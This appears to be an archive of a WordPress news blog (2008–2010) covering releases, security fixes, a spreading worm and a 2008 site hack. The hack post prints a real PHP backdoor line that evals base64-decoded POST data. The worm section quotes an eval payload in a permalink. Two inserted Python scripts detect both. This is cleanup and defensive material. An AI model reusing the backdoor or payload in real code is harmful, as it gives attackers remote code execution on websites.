WordPress 3.0 Beta 2

May 10, 2010 | No Comments Yet

The second beta of WordPress 3.0 was released May 6. This is a little behind schedule as the Release Candidates should be out by now.

Following the successful post-WordCamp San Francisco code sprint, we are now ready to release the second beta of WordPress 3.0.

The update focuses on improvements to the menu interface and the WordPress importer/exporter. Everyone is encouraged to become a beta tester with the help of the beta tester plugin.

Download WordPress 3.0 Beta 2

WordPress 3.0 Beta 1

April 3, 2010 | No Comments Yet

WordPress 3.0 is not far off now; here’s Beta 1! We’ve been covering the many features packed in this release but if you can’t wait, go ahead and take the early release for a spin.

As usual this is the first of the pre-releases before the final version comes out (in a month or so) which means take precautions when using it. If you’d like to help with development through testing, download WordPress 3.0 Beta 1 now.

BuddyPress 1.2 installs on WordPress

February 17, 2010 | No Comments Yet

BuddyPress Test Drive site

The biggest roadblocks to adopting social network software BuddyPress have finally been eliminated. With the latest version 1.2 coming out, you can now install BuddyPress on WordPress and not just WordPress MU. That goes for any WP version. Consider this the official way to run BP following this one.

Another highlight of this release is a quicker, simpler installation process: just 3 steps detailed in the download page. Simply add BuddyPress from your plugins page and activate a theme for it.

Probably the most exciting part of this release is a new default theme, which you can see running on the official site and the BuddyPress Test Drive site. BP is looking cleaner and more flexible than ever—you can create child themes with BP too.

WordPress 2.9.2

February 16, 2010 | 1 Comment

WordPress 2.9.2 fixes a bug that lets logged-in users see trashed posts created by other authors. It’s not a very urgent update, except for those who find the Trash bug an inconvenience, but it’s still wise to download the latest version whenever you can. This should give you ample time to back up first.

Haven’t used the new Trash feature before? Here’s a walkthrough on it and here’s how to customize it.

WordPress 2.9.1

January 5, 2010 | No Comments Yet

A beta and release candidate later, WordPress 2.9.1 is finally out. It addresses several issues including errors with cron, pingbacks, and scheduled posts. The entire list of fixes can be viewed here.

If you still have reservations about moving up to WP 2.9, this release should stabilize the upgrade now.

Download WordPress 2.9.1 or upgrade from within your admin panel. Interesting fact: WP 2.9 has passed one million downloads already!

WordPress 2.9

December 19, 2009 | No Comments Yet

WordPress 2.9 is finally here! Just days after the first release candidate comes out, the final version of the much-awaited WordPress upgrade has arrived. Looks like Christmas came early this year.

WP 2.9 has been dubbed “Carmen” after jazz vocalist Carmen McRae, and is the most feature-packed upgrade to date. The most popular ones mentioned are: the Trash, a built-in image editor, batch plugin updating and compatibility checking, and easier video embeds using oEmbed. The whole list is detailed in the Trac, of course.

Back up and upgrade now!

WordPress upgrade notifications from Google Analytics?

December 1, 2009 | No Comments Yet

If you’ve been blogging for a while now you’ll know that Google Analytics is an indispensable part of your website, so perhaps it’s not surprising that the service has this new feature: software version notifications for your CMS.

One of the great things about working at Google is that we get to take advantage of an enormous amount of computing power to do some really cool things. One idea we tried out was to let webmasters know about their potentially hackable websites. […] This time, however, our goal is not just to isolate vulnerable or hackable software packages, but to also notify webmasters about newer versions of the software packages or plugins they’re running on their website. [..] This is where we think we can help. We hope to let webmasters know about new versions of their software by sending them a message via Webmaster Tools. This way they can make an informed decision about whether or not they would like to upgrade.

I’m not sure this is any better than installing a plugin such as Update Notifier that sends emails whenever your WP installation or WP plugins need updating. After all, it still depends on the generated version meta tag which both WordPress and hackers use to check.

The upside here, though, is that at least Google is now looking into ways they can help with website maintenance, particularly security. And not just for WordPress, but for all other content management systems out there. Both CMS developers and webmasters stand to gain from the knowledge and resources Google can spend on this.

In the meantime, keep your eyes peeled as this new feature will be rolling out “soon”.

(Via WPLover)

WordPress 2.9 Beta 1

November 17, 2009 | No Comments Yet

And the road to WordPress 2.9 begins. WP 2.9 beta 1 is out.

It’s also the best way to check out what’s new, but if you can’t be bothered with a mere beta version yet, at least take this as an early heads up that you’ll be upgrading soon enough. So get ready!

WordPress 2.8.6

November 13, 2009 | No Comments Yet

WordPress 2.8.6 is another important security release that tackles vulnerabilities in the Press This bookmarklet and upload file names.

The first problem is an XSS vulnerability in Press This discovered by Benjamin Flesch. The second problem, discovered by Dawid Golunski, is an issue with sanitizing uploaded file names that can be exploited in certain Apache configurations. Thanks to Benjamin and Dawid for finding and reporting these.

Upgrade now!

Upgrade multiple plugins at once in WordPress 2.9

October 31, 2009 | No Comments Yet

Here’s another new feature coming in WordPress 2.9 that will make maintaining your blog a lot easier. You can now upgrade multiple plugins that have updates available all at once. No need to go through them one at a time. A welcome improvement for WordPress sites of all sizes. Visit WP Engineer for a screenshot of the feature.

There are few details yet but it’s great that we’re getting news about all these new improvements to WordPress before it comes out, so we know what to expect.

(Via Weblog Tools Collection)

WordPress 2.8.5

October 21, 2009 | No Comments Yet

WordPress has come out with yet another security upgrade (they call it a “hardening release”), notably in line with this trackback-related 0-day exploit.

As you know over the past couple of months we have been working on the new features for WordPress 2.9. We have also been working on trying to make WordPress as secure as possible and during this process we have identified a number of security hardening changes that we thought were worth back-porting to the 2.8 branch so as to get these improvements out there and make all your sites as secure as possible.

The WordPress team also recommends that users install the WordPress Exploit Scanner plugin, which you can download here.

WordPress Plugin: Upgrade Notification by Email

September 8, 2009 | No Comments Yet

Upgrade Notification by Email does exactly what its name says: anytime WordPress sends out a new update, your blog administrator’s email inbox will receive a notice that you should upgrade. Now you have no excuse not to install the latest, most secure version of WordPress on your website as soon as possible.

This plugin is for you if you don’t look inside of your Admin Panel every day (for example you have tens of WordPress installations) but still want to have WordPress up to date. After installation, the plugin will check every day if a newer version of WordPress is available and, if yes, will send an email to the blog’s admin with a notification.

Download Upgrade Notification by Email

Update and secure your WordPress installation

September 7, 2009 | No Comments Yet

There’s a worm circling the WordPress community and it’s attacking all sites that have not been updated to version 2.8.4. Lorelle reported its symptoms:

  1. “There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.””
  2. “The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution.”

This certainly sounds familiar. Matt explains further:

Right now there is a worm making its way around old, unpatched versions of WordPress. This particular worm, like many before it, is clever: it registers a user, uses a security bug (fixed earlier in the year) to allow evaluated code to be executed through the permalink structure, makes itself an admin, then uses JavaScript to hide itself when you look at users page, attempts to clean up after itself, then goes quiet so you never notice while it inserts hidden spam and malware into your old posts.

The tactics are new, but the strategy is not. Where this particular worm messes up is in the “clean up” phase: it doesn’t hide itself well and the blogger notices that all his links are broken, which causes him to dig deeper and notice the extent of the damage. Where worms of old would do childish things like defacing your site, the new ones are silent and invisible, so you only notice them when they screw up (as this one did) or your site gets removed from Google for having spam and malware on it.

It must be stressed that upgrading is a preventive measure; if you’ve been attacked, you’ll need to go through your files and databases to get rid of the offending code.

A stitch in time saves nine. Upgrading is a known quantity of work, and one that the WordPress community has tried its darndest to make as easy as possible with one-click upgrades. Fixing a hacked blog, on the other hand, is quite hard. Upgrading is taking your vitamins; fixing a hack is open heart surgery. (This is true of cost, as well.)
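As an added example (not part of the original post, of Lorelle's report, or of WordPress), the Python below applies the first clue to web server access logs: it percent-decodes each requested path, repeatedly in case of double encoding, and flags paths that contain an eval( or base64_decode( call. The combined log format, the function names and the sample log lines are assumptions constructed for illustration; the second sample path is the one quoted in the report.

```python
import re
from urllib.parse import unquote

# The two keywords the report names, matched as PHP function calls so that an
# ordinary slug such as "evaluation-of-themes" is not flagged.
CALL_PATTERNS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
}

# Assumption: access logs are in the common/combined format.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<path>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = "\n".join([
    '203.0.113.7 - - [05/Sep/2009:10:12:01 +0000] "GET /category/news/hello-world/ HTTP/1.1" 200 5120',
    '203.0.113.9 - - [05/Sep/2009:10:12:09 +0000] "GET /category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/ HTTP/1.1" 200 4810',
    '198.51.100.4 - - [05/Sep/2009:10:13:44 +0000] "GET /2009/09/evaluation-of-themes/ HTTP/1.1" 200 7321',
    '203.0.113.9 - - [05/Sep/2009:10:14:02 +0000] "GET /archives/%257B%2524%257Beval%2528base64_decode%2528x%2529%2529%257D%257D/ HTTP/1.1" 404 312',
])


def fully_unquote(path, max_rounds=3):
    """Percent-decode until the value stops changing (handles %257B-style double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(path)  # invalid escapes such as "%&" are left untouched
        if decoded == path:
            break
        path = decoded
    return path


def permalink_hits(path):
    """Return the keyword names whose call pattern appears in the decoded path."""
    decoded = fully_unquote(path).lower()  # PHP function names are case-insensitive
    return [name for name, rx in CALL_PATTERNS.items() if rx.search(decoded)]


def scan_log(text):
    """Return (line_number, matched_keywords) for every suspicious request line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = permalink_hits(match.group("path"))
        if hits:
            findings.append((lineno, hits))
    return findings


if __name__ == "__main__":
    for lineno, hits in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: suspicious permalink ({', '.join(hits)})")
```

A hit only shows that such a URL was requested; whether the site was altered still has to be checked in the permalink settings and the user list, as the report describes.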

WordPress 2.8.4

August 12, 2009 | No Comments Yet

As expected, Automattic promptly released WordPress 2.8.4, a security update to the previously mentioned remote admin password reset vulnerability.

Yesterday a vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.

Whether you’ve patched your WP installation as instructed or not, better grab this upgrade immediately. As always, back up before doing so!

WordPress 2.8.3

August 4, 2009 | No Comments Yet

WordPress 2.8.3 just dropped last night. It fixes several security issues that were overlooked with the WP 2.8.1 release, pointed out by several members of the WordPress community. Don’t you love it when everybody helps out?

Download the latest version now or upgrade automatically from your admin panel.

WordPress 2.0.x now deprecated

July 30, 2009 | No Comments Yet

The WordPress development team is now ending support for the WordPress 2.0.x branch, just a few months earlier than the planned 2010 deprecation.

Many of the security improvements to the new versions of WordPress in the last couple of years were complete reworks of how various systems were handled. Porting those changes to the 2.0.x branch would have been a monumental task and could have introduced instability or new bugs. We had to make hard decisions between stability and merging in the latest security enhancements. Additionally, far fewer people stayed on the 2.0.x branch than we anticipated. I take that as a testament to the new features in WordPress and perhaps even more the features offered by plugins, many of which don’t support older versions of WordPress!

The good news is, there are way fewer people who have left their WordPress installations outdated than updated. If you’re part of that group, though, do the right thing and upgrade now! The advantages—both in features and security—far outweigh the disadvantages.

WordPress 2.8.2

July 20, 2009 | No Comments Yet

WordPress 2.8.2 is an important security update that addresses an XSS vulnerability with unsanitized comment author URLs. No betas or release candidates came out before this version, but upgrade away! The notice should already be up in your WordPress admin panel.

WordPress 2.8.1 & WordPress MU 2.8.1

July 11, 2009 | No Comments Yet

The first official release since the big WordPress 2.8 is finally out. Highlights of the new features are listed in the announcement post, but you can also view the complete list here. Lots of fixed glitches, memory improvements, and improved security:

Core Security Technologies notified us that admin pages added by certain plugins could be viewed by unprivileged users, resulting in information being leaked. Not all plugins are vulnerable to this problem, but we advise upgrading to 2.8.1 to be safe.

WordPress MU also came out with version 2.8.1 a day after. Unlike WordPress, WPMU didn’t have a version 2.8, so this is a big update for all you multi-users out there (including BuddyPress). Download it now!

You can upgrade to WP 2.8.1 by downloading it at WordPress.org or by clicking “upgrade automatically” after following the notice in your administration panel.

WordPress 2.8.1 Beta 2

June 29, 2009 | No Comments Yet

The second beta of WordPress 2.8.1 is already out. This comes just days after the download counter for WordPress 2.8 crossed 1 million, in just 12 days!

The list of bug fixes in this beta is available here.

Download WordPress 2.8.1 Beta 2

WordPress 2.8.1 Beta 1

June 22, 2009 | No Comments Yet

Almost two weeks after the big release comes the first beta of WordPress 2.8.1. The bug fixes are listed here, which include memory fixes and added security.

Instructions for upgrading from WordPress 2.8 to WordPress 2.8.1 beta 1 can be found here. If you still haven’t upgraded to WordPress 2.8 and are more of a cautious user, you might want to wait until WP 2.8.1 comes out.

WordPress 2.8

June 11, 2009 | No Comments Yet

Six months after the release of the previous version comes WordPress 2.8 codename “Baker”, with the slogan “cool, smoother, simpler blogging”. Matt writes that the latest version is a nice fit and finish release for WordPress with improvements to themes, widgets, taxonomies, and overall speed:

  • Load pages, particularly styles and scripts, faster
  • Browse and install themes from the Theme Directory from the WordPress dashboard (just like plugins)
  • Edit theme and plugin code with syntax highlighting using the CodePress editor
  • Enjoy more user-friendly Widgets with a revamp of its interface
  • Use Screen Options on every page in the dashboard
  • And more!

Back up your database and files, then hit “update now” in your dashboard. Don’t forget to check out the video above!

WordPress 2.8 Release Candidate 1

June 8, 2009 | No Comments Yet

Almost there folks! WordPress 2.8 now has a release candidate available for download. Check out the changelog for a list of modifications since beta 2. It’s June 8 and only a couple of days left before the final version ships.

According to the announcement, “With Release Candidate 1, we think WordPress 2.8 is ready and complete.” Will you hold out until then, or grab this one anyway?

WordPress 2.8 Beta 2

May 25, 2009 | No Comments Yet

WordPress 2.8 Beta 2 is out. You can check out the changes made since the first came out here. But as always, the Codex is your reference for the major changes since 2.7.

Download WordPress 2.8 beta 2

WordPress 2.8 Beta 1

May 18, 2009 | No Comments Yet

WordPress 2.8 is coming! Technically, it’s already arrived with the release of this first beta. If you’ve been absolutely impatient about it, download away. If not, you can wait a few more days until it hits gold.

The latest features of WordPress 2.8 are documented here. Lots of admin improvements and hopefully, few additional features that will break existing themes and plugins.

Download WordPress 2.8 beta 1

Update multiple WordPress blogs with a Subversion bash script

February 26, 2009 | No Comments Yet

David Peralty of Devlounge details how to create a special script for updating your WordPress install if you’re using Subversion. Perfect for the power user running multiple WP blogs on his/her own server.

Now this might not mean much if you’re not familiar with Subversion, but David also points to another article of his that introduces you to it. If its abbreviation “SVN” sounds familiar, it’s probably because it’s the same updating and versioning system that Automattic uses for WordPress. Wouldn’t you like to learn how to use it as well?

And here’s WordPress.org’s page on SVN.

WordPress 2.7.1

February 11, 2009 | No Comments Yet

As expected, the official release of WordPress 2.7.1 is now out. You should be getting a notification in the administration panel prompting you to upgrade, which you can do either manually or automatically. You don’t even have to visit WordPress.org to get the download file. There’s a link under Tools > Upgrade.

You can check out the list of closed tickets and changed files for WP 2.7.1.

WordPress 2.7.1 RC1

February 9, 2009 | No Comments Yet

The first release candidate of WordPress 2.7.1 came out over the weekend. Weblog Tools Collection lists some of the fixes and improvements for your perusal. You can view the original announcement by Ryan Boren here.

Download WordPress 2.7.1.

WordPress 2.7.1 Beta 1

February 4, 2009 | No Comments Yet

The first maintenance release of WordPress 2.7 is imminent and you can get a beta copy today. Check out all the fixes here.

One interesting note here is if you wish to use the built-in automatic upgrade with the beta, this is what you have to do:

To automatically upgrade from 2.7 to 2.7.1 Beta 1, change the version in your wp-includes/version.php file from 2.7 to 2.7.1-beta and then visit Tools->Upgrade.

Of course you can always download WordPress 2.7.1 beta 1 and upgrade manually.

It’s exciting to see a new release since WP 2.7 dropped and I can’t wait to see what new features the developers are cooking up in the following updates.

WordPress 2.7

December 11, 2008 | No Comments Yet

It’s here! Just a day after release candidate 2 was announced, and after months of eager anticipation from the community, the final version of WordPress 2.7 “Coltrane” is now available for download. Be sure to watch this jazzy video tour (I love how they tied in the customizable features of WordPress to the improvisational nature of jazz):

This WordPress release has been a much-awaited one with all its new features: a new look for the admin pages, customizable post panels, automatic upgrades, bulk editing, comment threading, sticky posts, Press This!, and more, giving you a blogging experience that’s flexible and fast.

Download WordPress 2.7 now!

WordPress 2.7 Release Candidate 1

December 2, 2008 | 1 Comment

This is it, folks: the first release candidate of WordPress 2.7 is available for download. The new icons of the admin panel are in, and 280 commits have been made since WP 2.7 beta 3.

We’re one step closer to the final release of WP 2.7, and it’s only a matter of time.

WordPress 2.7 Beta 3

November 16, 2008 | No Comments Yet

Beta 3 of WordPress 2.7 is out! According to Word Munger, it was actually released live during WordCamp Charlotte. Read the list of changes here.

WordPress 2.7 Beta 2

November 6, 2008 | 1 Comment

Just a few days after releasing the first beta, WordPress 2.7 Beta 2 is now out! Based on the announcement, it looks like bug fixes were the focus of this beta release.

And since you can automatically upgrade to the latest version of WordPress from within the admin panel, check it out:

If you have already installed beta 1, you can update to beta 2 via the Tools -> Update menu. Beta 1 does have a bug in the automatic upgrade that breaks certain setups, so be prepared to download and install Beta 2 manually if you experience problems.

Keep this in mind even if you haven’t installed the beta yet, but plan to upgrade to WP 2.7 in the future.

WordPress 2.7 Beta 1

November 2, 2008 | No Comments Yet

The first beta of the much-awaited WordPress 2.7 version is out! Prepare for a completely revamped admin interface and all the new features we’ve been raving about the past few months.

Several things to note: WP 2.7 Beta 1 works best in Firefox and Safari (for now). And the final WP 2.7 release is 2 weeks behind schedule.

The downside is more waiting; the upside is the team isn’t rushing to get it out but to polish it the best way possible. It’s slated for November 10th, and while the developers are still trying their best to get it done by that date, a release candidate should be out by then. End of November seems more like the WP 2.7 final release.

WordPress 2.6.3

October 24, 2008 | No Comments Yet

WordPress 2.6.3 provides a security fix for a vulnerability found in the Snoopy library, which according to the project page is a “PHP class that simulates a web browser”.

Since this is a security upgrade, it’s best that you download the latest version immediately. But since only 2 files were updated, i.e. wp-includes/class-snoopy.php and wp-includes/version.php, you can also just grab those and replace the ones on your server.

WordPress MU 2.6.2

October 1, 2008 | No Comments Yet

WordPress MU 2.6.2 is a required upgrade with several significant bug fixes, though no urgent security issues (unlike WordPress 2.6.2).

Download the latest version of WordPress MU here.

WordPress.com users can go ad-free (for a fee)

September 19, 2008 | No Comments Yet

Matt Mullenweg has just announced at the WordPress.com blog that based on their experimentation with Google ads, they’ve decided to make displaying advertisements optional—but for a fee.

…Light advertising has allowed us to focus on free features for you guys rather than paid upgrades, and enabled us to invest in infrastructure so your blog is always fast and reliable and never shows a fail whale.


The No-ads upgrade can be purchased for 30 credits a year ($0.08 a day) through the Upgrades tab in your blog’s dashboard.

So that basically answers two things: (1) it costs a lot to keep things free so they’re running ads, though only at a reasonable amount; and (2) yes, you can finally remove them, though you’ll have to pay for it.

The next question would have to be: will WordPress.com users be able to make money for themselves by running their own ads? Matt says they’re thinking about it, though take note that it will probably be a paid upgrade too.

Early preview of WordPress 2.7

September 4, 2008 | No Comments Yet

Although WordPress 2.7 is still a long way from being released, Weblog Tools Collection has posted several screenshots of it that reveal changes that improve upon the last major interface upgrade from WordPress 2.5. Here are some quotes from the blog post:

  • “There is now a left hand side navigational column.”
  • “The Write Panel in WordPress 2.7 has gone through an overhaul as well. I think you’ll really enjoy the fact that drag and drop elements are back.”
  • “Browsing and installing plugins from the repository looks to become even more convenient now that you can do both from the WordPress back end.”
  • “You can now configure a large image size, default image size, default image alignment, and default image links. Very nice, time saving options.”

Looks like another exciting release in the history of WordPress. Watch out for more developments at the WordPress Codex page dedicated to WordPress 2.7.

WordPress MU 2.6.1

September 4, 2008 | No Comments Yet

In coordination with the last official release of WordPress, WordPress MU 2.6.1 is out. Unlike WP 2.6.1, though, which is a maintenance release, WP MU 2.6.1 is required.

Download the latest version of WordPress MU here.

WordPress 2.6.1

August 16, 2008 | No Comments Yet

WordPress 2.6.1 is finally out. Here’s a nice tip if you’ve been wondering about when you should upgrade:

With 2.6.1, we’re continuing our trend of releasing a maintenance release shortly after a major release in order to get fixes for the inevitable “dot zero” bugs into your hands without a long wait. If you’re happy with 2.6, however, keep on using it. You need not upgrade to 2.6.1 if 2.6 is getting the job done.

If you’re an early adopter, you probably made the move to WP 2.6 already, and you may not have to upgrade immediately since this is not an urgent security release. If you haven’t, waiting for the “dot one” release ensures a lot more bug fixes than the “dot zero” release. Check out the list of 60 bug fixes here.

Download WordPress 2.6.1 here.

WordPress 2.6.1 Beta 2

August 13, 2008 | No Comments Yet

Beta 2 of WordPress 2.6.1 is out. The team is approaching 60 bugs fixed for the official 2.6.1 release. You can see the new fixes since beta 1 here.

Grab WP 2.6.1-b2 here.

WordPress 2.6.1 Beta 1

August 8, 2008 | No Comments Yet

WordPress 2.6.1 Beta 1 is out. You might want to grab it now, or wait until an official release arrives, which Ryan Boren says will arrive around the time of this year’s WordCamp San Francisco.

Here’s another tip from him:

With 2.6.1, we’re continuing our trend of releasing a dot one release about a month after dot zero. We want to get fixes for the inevitable dot zero bugs into your hands without a long wait. If you’re happy with 2.6, you can ignore 2.6.1.

There are over 50 fixes, a lot of which address the typos in code and major bugs—like the 404 error that turns up when your permalink structure is /index.php/%postname%/.

WordPress MU 2.6

July 29, 2008 | No Comments Yet

WordPress multi-user or WPMU is now at version 2.6, whose code is based on the standard WordPress 2.6 release. You’ll find similar new features like the return of the “Press This!” bookmarklet, Google Gears support, theme previews, and so on. Donncha Ó Caoimh has more details.

Download WordPress MU 2.6 here.

WordPress 2.6 bugs and fixes

July 28, 2008 | 4 Comments

It’s only been a few days since the release of WordPress 2.6 and already we are hearing about some major bugs and problems. Whether you’ve upgraded already or not, it’s best to be aware of these issues so that you can address them immediately. Here are some of the major ones being discussed around the blogs:

Missing Categories

If you run a big blog with lots of categories, chances are your categories have mysteriously disappeared. David Cumps wrote a fix, which requires phpMyAdmin knowledge.

get_posts Not Working

If you have a custom theme that uses multiple loops, chances are it uses get_posts. Unfortunately there are several problems with the function in this version, so you might be better off using query_posts instead.

index.php Permalinks Not Working

If your permalink structure involves “index.php”, chances are your blog post links (but not your blog pages) are broken.

More stuff to be fixed in WordPress 2.6.1

Don’t forget that if you have custom themes and plugins installed, check first to see if they’re compatible with the latest version of WordPress before you start complaining. Then search for your problem first in the Support forum.

Visit the 2.6.1 roadmap for a detailed list of the bugs squashed. Also visit the WordPress Development Updates blog for up to the minute information from the WP team.

WordPress 2.6

July 15, 2008 | No Comments Yet

After 3 betas and one release candidate, WordPress 2.6 “Tyner” is here. Automattic also put up a short video tour of the new version:

Discussed in the WP 2.6 announcement post are the highlighted features we’ve all been expecting for a few months now:

  • Post Revisions: Wiki-like tracking of edits
  • Press This!: Post from wherever you are on the web
  • Shift Gears: Turbo-speed your blogging
  • Theme Previews: See it before your audience does
  • and many other smaller features and improvements

Ryan Boren discusses in depth SSL and Cookies in WordPress 2.6, which I’m sure is the first of many blog posts to tackle the new stuff under the hood.

WordPress 2.6 Release Candidate 1

July 14, 2008 | No Comments Yet

The final version of WordPress 2.6 draws closer than ever as Release Candidate 1 is released.

According to Ryan Boren, here are the latest features included since beta version 3:

  • Media uploader and gallery improvements
  • Image caption and image editing fixes
  • Press This fixes
  • Ability to toggle between the flash uploader and a regular browser uploader
  • Notification bubble on the Plugins menu when plugin updates are available

The complete list of changes can, of course, be found in the WordPress Trac.

Download WP 2.6 RC1 here.

Has Your WordPress Been Hacked Recently?

April 16, 2008 | 34 Comments

Matt Mullenweg’s recent post about a “bogus” WordPress security breach had me wondering about my own WordPress sites. Unfortunately, it turns out I’ve become a victim of a WordPress vulnerability whose symptoms are detailed here. Took me two whole nights of restoring my files and folders to their pristine condition. (Fingers crossed.) Take note that this is different from the ro8kfbsmag.txt hack, and seems to be a fairly recent attack. Thankfully, there are a lot of tell-tale signs:

Extra code added to the first line of PHP files

<?php if(md5($_COOKIE['_wp_debugger'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){ eval(base64_decode($_POST['file'])); exit; } ?>

Note that the letters and numbers vary.

Solution: open the infected file and delete that code. I recommend using an FTP client like FileZilla, which when coupled with a text editor lets you edit a file then reflect those changes on the server very quickly.

New files ending in _new, _old, .pngg, .jpgg, .giff appearing inside writable directories

See if there are any files in writable directories that have the same name as an existing file but with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files are executable scripts that display a fake “404 Not Found” error when called from a browser, but display system info about the server your site is sitting on when called from a script with the matching hash from one of the hacked PHP scripts.

Solution: delete the files.

New files named wp-info.txt which contain database usernames and passwords

This file will contain userinfo dumped from the MySQL database… usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.

Solution: delete the file and change all your passwords! Aside from your own, your visitors’ emails and passwords are also there, and somebody else is exploiting that information already.

New “WordPress” user in database (hidden in the admin panel users page)

One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn’t been upgraded yet, was the silent addition of the user “WordPress”, with no info save a password, and an add date of all zeroes. There’s also no indication of user level in the database, and the user doesn’t show up in the User menu. However, when I was going through and deleting unnecessary “admin” logins, “WordPress” came up as one of the user options to reassign posts to… otherwise it might have been a while before I’d found that buried in the database.

Solution: delete the user. You need to access your database through phpMyAdmin or something similar.

WordPress version changed to 2.5

I’m logged into a site I know is still running 2.1.3, but the footer in the admin panels say 2.5 now.

Solution: upgrade to WordPress 2.5. Keeping your installation up-to-date eliminates old vulnerabilities.

More signs

The file creation and modification seemed to take place on April 11. For me it was the 12th. That’s surprisingly recent.

Also, you might get a lot of suspicious error messages in your logs, dating as far back as last year.

More Solutions

When it comes to security, there are a lot of possible culprits but in this particular situation, we can only be thankful there are a lot of indicative factors and fairly easy ways to resolve the problem. I cannot emphasize enough how important it is to upgrade immediately. Is it better to have non-working themes and plugins than an insecure site? I would think not.

However, one has to wonder how upgrading to WordPress 2.5 can fix the problem. Remember that when upgrading you are advised to delete the old files first, then upload the new files. If you just upload and overwrite the old files, the files added by the attacker, such as the _new, _old, .pngg, .jpgg, and .giff ones, will remain on the server. Removing them one by one by going through each folder on your website will definitely be painful!

Also take a look at your file and folder permissions. We usually have to CHMOD our uploads, themes, and plugins folders so that we can edit them in the administration panel, but they also make for a hacker’s point of entry.

I believe the most crucial problem here is the wp-info.txt files. The other penetrations could have been used for adding spam comments and links only, but having access to people’s passwords is far worse, especially when it includes your own readers.
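The file-based signs above can be checked in one pass rather than folder by folder. This Python scanner is an added example, not part of the original post: it walks a site directory and reports wp-info.txt files, files with the listed name endings, and PHP files whose first line matches the injected pattern. The function names, reason labels and sample tree are assumptions constructed for illustration, and a name match is only a candidate for manual review.

```python
import os
import re
import tempfile

# Injected first line; the cookie name and the 32-hex hash vary per infection.
BACKDOOR_RE = re.compile(
    r"md5\(\s*\$_COOKIE\[[^\]]+\]\s*\)\s*==\s*[\"'][0-9a-f]{32}[\"']"
    r".*?eval\(\s*base64_decode\(\s*\$_POST\[", re.IGNORECASE)
# File-name endings of the dropped scripts listed in the post.
DROPPED_SUFFIXES = ("_new.php", "_old.php", ".php.pngg", ".php.jpgg", ".php.giff")

def scan(root):
    """Return sorted (relative_path, reason) pairs for files showing the signs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            lower = name.lower()
            if lower == "wp-info.txt":
                findings.append((rel, "credential dump"))
            elif lower.endswith(DROPPED_SUFFIXES):
                findings.append((rel, "dropped script name"))
            elif lower.endswith(".php"):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if BACKDOOR_RE.search(fh.readline()):
                        findings.append((rel, "injected first line"))
    return sorted(findings)

def build_sample_tree(root):
    """Write a small constructed site tree (sample data, not from a real site)."""
    injected = ('<?php if(md5($_COOKIE["_c"])=="' + "ab" * 16 +
                '"){ eval(base64_decode($_POST["f"])); exit; } ?>\n<?php // theme\n')
    samples = {
        "index.php": "<?php // clean file\n",
        "wp-content/themes/x/header.php": injected,
        "wp-content/uploads/photo.php.jpgg": "<?php // constructed\n",
        "wp-content/uploads/wp-info.txt": "constructed placeholder\n",
        "wp-content/plugins/p/main_old.php": "<?php // constructed\n",
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        print("\n".join(f"{why}: {rel}" for rel, why in scan(tmp)))
```

The hidden “WordPress” user and the plugin entries in wp_options live in the database, so this file scan does not cover them.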

Update (April 17): There’s now a WordPress Codex page for this issue.

Update (May 2): Please continue to visit the WordPress Support forum for any new developments on this hack. There are other symptoms popping up, like unwanted plugins activated in the database (see active_plugins and deactivated_plugins under wp_options).

Update (June 10): Check out this very helpful post by Donncha O Caoimh.


Technorati’s Ultimatum: Upgrade WordPress to 2.5 Now or Your Blog Will NOT Be Indexed

April 8, 2008 | 7 Comments

Now this comes as a surprise. Technorati has actually given an ultimatum to vulnerable WordPress blogs, saying that unless they upgrade to the latest, most secure version, 2.5, they will not be indexed.

Blogs that have been compromised by this security vulnerability are typified by having links to spam destinations inserted onto the blog page. These link insertions may be invisible to casual observations; the links are often obscured by style attributes that render them invisible. These links are still seen by crawlers such as Technorati’s, Google’s and Yahoo’s.

Technorati also mentions that blogs hosted on WordPress.com should not have this vulnerability.

I know Filipino bloggers are big fans of Technorati, so here’s yet another reason for you to upgrade to WordPress 2.5. Don’t worry, it’s not scary at all!


WordPress 2.5 Released

March 31, 2008 | 3 Comments

The long-awaited version of WordPress is finally here! WordPress 2.5 “Brecker” was released last March 29, and just about the same time the official WordPress website got a makeover to match the new administration panel.

2.5 is a major milestone for WordPress not because it added dozens of user-requested features, but because it reaffirms that we’re as passionate about blogging as the day we started. Our community is too fierce to rest on its laurels — contrary to what pundits claim, blogging is far from “finished” and every improvement just whets our appetite for more. And more is coming.

Version 2.5 had two release candidates before the final version and tons of discussions about its upcoming features, so those who have been keeping up-to-date probably already know what to expect. For those who don’t, better read it straight from the horse’s mouth. Here’s a shortlist:

User Features

  • Cleaner, faster, less cluttered dashboard
  • Dashboard Widgets
  • Multi-file upload with progress bar
  • EXIF extraction
  • Search posts and pages
  • Tag management
  • Password strength meter
  • Concurrent editing protection
  • Few-click plugin upgrades
  • Friendlier visual post editor
  • Built-in galleries

